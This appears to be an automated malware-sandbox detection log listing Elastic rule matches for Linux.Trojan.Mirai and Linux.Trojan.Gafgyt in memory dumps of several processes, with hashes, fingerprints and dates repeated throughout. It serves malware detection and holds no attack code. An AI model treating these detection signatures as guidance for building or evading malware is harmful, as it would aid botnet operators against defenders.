Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
